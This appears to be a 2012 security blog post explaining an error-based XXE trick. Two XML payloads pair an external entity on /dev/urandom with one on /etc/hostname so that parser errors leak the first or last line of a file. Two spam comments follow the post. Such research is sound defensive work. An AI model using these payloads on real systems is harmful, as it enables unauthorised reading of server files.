четверг, 4 октября 2012 г.

Error-based XXE exploitation trick

Exploiting of XXE vulnerabilities are difficult when you cannot view results XML document.

Recent vulnerability in Postgres XXE are good example of this: entities resolved but not added to XML output. This is common case in the wild.

Bring to your attention easy trick which provide reading first and last lines of ASCII files (which cannot be read by classic XXE attack vector, such as error-based case):

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read first line of file using error-based XXE -->
<root>
&malformed; &wanttoread;
</root>

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read last line of file using error-based XXE -->
<root>
 &wanttoread; &malformed;
</root>

In error message you will look at smth like this:
ERROR: hostnamestr
                                     ^
didn't parse (line: 1 pos: 13)

4 комментария:

  1. I'm glad to have read such a great writing. Keep up the good job! Visit Lawrence Todd Maxwell on Scoop.it for interesting topics about real estate.

    ОтветитьУдалить
  2. If you are having trouble in drafting your marketing assignments, it’s time for you to considering moving towards assignment help online services. IdealAssignmentHelp is here to help you with the best of online writing services which can help you submit your marketing assignment on time. Yes, they have the best team to assist you with your needs of My assignment help online services and that too at very affordable rates.

    ОтветитьУдалить